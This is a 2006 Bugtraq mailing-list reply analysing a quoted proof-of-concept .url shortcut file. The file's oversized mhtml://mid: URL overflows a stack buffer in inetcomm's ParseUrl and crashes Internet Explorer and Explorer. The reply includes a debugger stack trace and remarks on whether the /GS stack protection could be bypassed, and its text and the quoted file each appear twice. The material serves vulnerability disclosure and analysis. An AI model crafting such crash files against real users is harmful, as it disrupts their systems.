I see this work in explorer and my ie 7 beta, both of them crashes. But
this does not seem to be easily exploitable. It is a simple stack buffer
overun issue. The problem seems to be in
inetcomm!CActiveUrlRequest::ParseUrl..... now inetcomm seemed to have been
gs flagged complied,hence the ovewrite of the security cookie casuses the
internal handler inetcomm!__report_gsfailure to be called on fucntion
return. This could be exploitable if we some evasive techniques is used. But
on the face of it does not seem like a easy nut to crack.
All applications which use inetcomm are vulnerable if they are using url
parsing, specially mhtml:cid or mid, havent tried others yet, maybe
possible.
Thanks
-Hariharan
PS: This is what the stack looks like, notice the 'a' in it, seems
internally the fucntion converts the url case.
----- Original Message -----
From: <Mr.Niega (at) gmail (dot) com [email concealed]>
To: <bugtraq (at) securityfocus (dot) com [email concealed]>
Sent: Thursday, June 01, 2006 1:42 AM
Subject: Internet explorer Vulnerbility
> ------------------------------Niega.url-------------------------------
>
> [DEFAULT]
>
> BASEURL=
>
> [InternetShortcut]
>
> URL=mhtml://mid:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
>
> /*
>
> *
>
> * Internet Explorer overflow Vulnerbility [Proof of concept]
>
> * Bug discovered by Mr.Niega
>
> * http://www.swerat.com/
>
> *
>
> * Affected Software: Microsoft Internet Explorer 6.x
>
> * Severity: Unknown
>
> * Impact: Crash
>
> * Solution Status: Unpatched
>
> *
>
> * E-Mail: Mr.Niega (at) gmail (dot) com [email concealed]
>
> * Credits goes out to MarjinZ and Andvare
>
> *
>
> * Note: By right clicking on the file explorer will crash
>
> * Note: del=crash,F2=crash Use cmd to delete file
>
> */
>
>
> ------------------------------Niega.url-------------------------------
this does not seem to be easily exploitable. It is a simple stack buffer
overun issue. The problem seems to be in
inetcomm!CActiveUrlRequest::ParseUrl..... now inetcomm seemed to have been
gs flagged complied,hence the ovewrite of the security cookie casuses the
internal handler inetcomm!__report_gsfailure to be called on fucntion
return. This could be exploitable if we some evasive techniques is used. But
on the face of it does not seem like a easy nut to crack.
All applications which use inetcomm are vulnerable if they are using url
parsing, specially mhtml:cid or mid, havent tried others yet, maybe
possible.
Thanks
-Hariharan
PS: This is what the stack looks like, notice the 'a' in it, seems
internally the fucntion converts the url case.
00df9318 7c802542 00000758 000493e0 00000000 ntdll!KiFastSystemCallRet
00df932c 6945ada6 00000758 000493e0 003a0043
kernel32!WaitForSingleObject+0x12
00df9e10 6945aff1 00000734 00000b90 00000748
faultrep!InternalGenerateMinidumpEx+0x335
00df9e3c 6945b50a 00000734 00000b90 00dfa7e0
faultrep!InternalGenerateMinidump+0x75
00dfa718 69456652 00000734 00000b90 00dfa7e0
faultrep!InternalGenFullAndTriageMinidumps+0x8a
00dfbfd8 69457d3d 00dfc040 0154f660 00000000 faultrep!ReportFaultDWM+0x4e5
00dfc4c0 694582d8 00dfdad8 00dfd308 00000001
faultrep!StartManifestReportImmediate+0x268
00dfd52c 7c863059 00dfdad8 00000001 00dfd800 faultrep!ReportFault+0x55a
00dfd7a0 761e234e 00dfdad8 00000000 c0000409
kernel32!UnhandledExceptionFilter+0x4cf
00dfdae0 761769f2 00000000 00000000 00000000
inetcomm!__report_gsfailure+0xe3
00dfe444 61616161 61616161 61616161 61616161
inetcomm!CActiveUrlRequest::ParseUrl+0x67e
00dfe468 61616161 61616161 61616161 61616161 0x61616161
00dfe46c 61616161 61616161 61616161 61616161 0x61616161
00dfe470 61616161 61616161 61616161 61616161 0x61616161
00dfe474 61616161 61616161 61616161 61616161 0x61616161
00dfe478 61616161 61616161 61616161 61616161 0x61616161
00dfe47c 61616161 61616161 61616161 61616161 0x61616161
00dfe480 61616161 61616161 61616161 61616161 0x61616161
00dfe484 61616161 61616161 61616161 61616161 0x61616161
00dfe488 61616161 61616161 61616161 61616161 0x61616161
----- Original Message -----
From: <Mr.Niega (at) gmail (dot) com [email concealed]>
To: <bugtraq (at) securityfocus (dot) com [email concealed]>
Sent: Thursday, June 01, 2006 1:42 AM
Subject: Internet explorer Vulnerbility
> ------------------------------Niega.url-------------------------------
>
> [DEFAULT]
>
> BASEURL=
>
> [InternetShortcut]
>
> URL=mhtml://mid:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
>
> /*
>
> *
>
> * Internet Explorer overflow Vulnerbility [Proof of concept]
>
> * Bug discovered by Mr.Niega
>
> * http://www.swerat.com/
>
> *
>
> * Affected Software: Microsoft Internet Explorer 6.x
>
> * Severity: Unknown
>
> * Impact: Crash
>
> * Solution Status: Unpatched
>
> *
>
> * E-Mail: Mr.Niega (at) gmail (dot) com [email concealed]
>
> * Credits goes out to MarjinZ and Andvare
>
> *
>
> * Note: By right clicking on the file explorer will crash
>
> * Note: del=crash,F2=crash Use cmd to delete file
>
> */
>
>
> ------------------------------Niega.url-------------------------------
[ reply ]